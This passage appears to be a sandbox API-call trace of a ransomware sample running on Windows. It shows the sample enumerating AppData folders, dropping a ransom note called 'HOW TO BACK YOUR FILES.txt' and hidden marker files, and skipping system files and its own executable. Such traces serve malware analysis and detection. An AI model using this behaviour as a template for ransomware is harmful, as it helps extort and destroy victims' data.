nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.824] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0055.824] lstrcpyW (in: lpString1=0x130ebb2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.824] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers\\8wekyb3d8bbwe\\fonts\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.824] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.825] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.825] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.825] CloseHandle (hObject=0x278) returned 1 [0055.825] CloseHandle (hObject=0x27c) returned 1 [0055.825] GetCurrentThreadId () returned 0xd98 [0055.825] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0055.825] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" [0055.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115748 | out: hHeap=0xe0000) returned 1 [0055.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0055.825] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" [0055.825] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\" [0055.825] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\.BFC0E91B00AE8A0620D3" [0055.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\peerdistrepub\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.826] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.829] FlushFileBuffers (hFile=0x27c) returned 1 [0055.830] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.830] CloseHandle (hObject=0x27c) returned 1 [0055.831] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub") returned 43 [0055.831] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.831] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0055.831] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.831] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.831] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.831] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.831] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.831] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.831] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.831] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.831] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.831] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.831] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea993314, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea993314, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.831] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.831] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.831] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea993314, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea993314, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.831] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0055.831] lstrcpyW (in: lpString1=0x130eb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.831] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\peerdistrepub\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.832] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.832] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.832] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.832] CloseHandle (hObject=0x278) returned 1 [0055.832] CloseHandle (hObject=0x27c) returned 1 [0055.832] GetCurrentThreadId () returned 0xd98 [0055.832] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0055.832] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" [0055.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xee618 | out: hHeap=0xe0000) returned 1 [0055.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0055.833] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" [0055.833] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\" [0055.833] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\.BFC0E91B00AE8A0620D3" [0055.833] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.834] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.836] FlushFileBuffers (hFile=0x27c) returned 1 [0055.837] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.837] CloseHandle (hObject=0x27c) returned 1 [0055.839] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages") returned 38 [0055.839] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.839] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0055.839] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.839] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.839] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.839] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.839] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xea993314, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.840] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.840] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.840] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.840] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.840] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xea993314, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xea993314, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xea9b95bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.840] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.840] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.840] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a729855, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7a79bf59, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7a79bf59, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", cAlternateFileName="1527C7~1")) returned 1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2=".") returned 1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="..") returned 1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="bootmgr") returned -1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="boot") returned -1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.840] lstrcmpiW (lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.840] lstrcpyW (in: lpString1=0x130eb86, lpString2="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy" | out: lpString1="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy") returned="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy" [0055.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0055.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x10a2f0 [0055.840] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf63b0 [0055.840] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b15e23b, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x8b92dcc4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8b92dcc4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9E2F88E3.Twitter_wgeqdkkx372wm", cAlternateFileName="9E2F88~1.TWI")) returned 1 [0055.840] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.840] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.840] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="Rabbit4444.exe") returned -1 [0055.840] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2=".") returned 1 [0055.840] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="..") returned 1 [0055.841] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="windows") returned -1 [0055.841] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="bootmgr") returned -1 [0055.841] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="pagefile.sys") returned -1 [0055.841] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="boot") returned -1 [0055.841] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="ids.txt") returned -1 [0055.841] lstrcmpiW (lpString1="9E2F88E3.Twitter_wgeqdkkx372wm", lpString2="NTUSER.DAT") returned -1 [0055.841] lstrcpyW (in: lpString1=0x130eb86, lpString2="9E2F88E3.Twitter_wgeqdkkx372wm" | out: lpString1="9E2F88E3.Twitter_wgeqdkkx372wm") returned="9E2F88E3.Twitter_wgeqdkkx372wm" [0055.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6568 [0055.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8c) returned 0x11edf8 [0055.841] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf6450 [0055.841] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1206ac31, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x1206ac31, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1206ac31, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="Rabbit4444.exe") returned -1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2=".") returned 1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="..") returned 1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="windows") returned -1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="bootmgr") returned -1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="pagefile.sys") returned -1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="boot") returned -1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="ids.txt") returned -1 [0055.841] lstrcmpiW (lpString1="ActiveSync", lpString2="NTUSER.DAT") returned -1 [0055.841] lstrcpyW (in: lpString1=0x130eb86, lpString2="ActiveSync" | out: lpString1="ActiveSync") returned="ActiveSync" [0055.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0055.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x64) returned 0x120a38 [0055.841] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6570 [0055.841] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83df20d8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x83eb0c97, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x83eb0c97, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", cAlternateFileName="C5E252~1")) returned 1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2=".") returned 1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="..") returned 1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.841] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.842] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.842] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.842] lstrcmpiW (lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.842] lstrcpyW (in: lpString1=0x130eb86, lpString2="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy" | out: lpString1="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy") returned="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy" [0055.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0055.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x103f58 [0055.842] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6490 [0055.842] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8306d465, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x83105dc2, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x83105dc2, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CortanaListenUIApp_cw5n1h2txyewy", cAlternateFileName="CORTAN~1")) returned 1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2=".") returned 1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="..") returned 1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="ids.txt") returned -1 [0055.842] lstrcmpiW (lpString1="CortanaListenUIApp_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.842] lstrcpyW (in: lpString1=0x130eb86, lpString2="CortanaListenUIApp_cw5n1h2txyewy" | out: lpString1="CortanaListenUIApp_cw5n1h2txyewy") returned="CortanaListenUIApp_cw5n1h2txyewy" [0055.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6508 [0055.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11eb98 [0055.842] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6510 | out: ListHead=0xf68b0, ListEntry=0xf6510) returned 0xf64b0 [0055.842] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df3049, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81e65763, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x81e65763, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DesktopLearning_cw5n1h2txyewy", cAlternateFileName="DESKTO~2")) returned 1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.842] lstrcmpiW (lpString1="DesktopLearning_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 